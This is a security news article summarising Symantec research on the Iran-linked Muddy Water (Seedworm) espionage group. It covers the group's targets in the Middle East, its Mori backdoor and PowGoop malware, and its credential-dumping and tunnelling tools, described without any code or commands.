A cyber espionage group known as Muddy Water (Seedworm) thought to be working on behalf of the Iranian government is continuing to target entities in the Middle East. In recent months, Symantec’s Threat Hunter team has observed multiple hacking attempts against government organizations and telecommunications operators in Iraq, Kuwait, Turkey and the United Arab Emirates.
In a recent wave of attacks the group has been deploying a known Seedworm backdoor (Backdoor.Mori), and researchers said that many of organizations attacked by Muddy Water have been also targeted by the relatively new PowGoop malware, suggesting that the group has added the tool to its bag of tricks. However, Symantec says that at present it “can only establish a medium-confidence link between PowGoop and Seedworm.”
“In the majority of recent infections, PowGoop appears to have been deployed via a remote execution tool known as Remadmin. This tool is used to execute PowerShell to read and decode the contents of a file which is used to execute the contents in memory,” Symantec said.
Additionally, during PowGoop activity, the research team also observed the attackers downloading tools and some unknown content from GitHub repos.
Symantec says it detected attacks involving PowGoop against organizations in government, technology, telecoms, oil and gas, real estate, and education sectors in Iraq, Afghanistan, Israel, Turkey, Azerbaijan, Georgia, Cambodia, and Vietnam.
In the recent attacks the researchers observed the hackers stealing credentials by dumping the contents of the Windows Registry to files in the same directories as Seedworm backdoors, and using Quarks password dumper (Quarks PwDump) to steal local account password hashes. The attackers also established tunnels to their own infrastructure with the help of open-source tools like Secure Sockets Funneling (SSF) and Chisel, which allowed the malicious actor to configure local and remote port forwarding as well as copying files to compromised machines.
“Seedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering operations across the Middle East. While the connection between PowGoop and Seedworm remains tentative, it may suggest some retooling on Seedworm’s part. Any organizations who do find evidence of PowGoop on their networks should exercise extreme caution and perform a thorough investigation,” the researchers warned.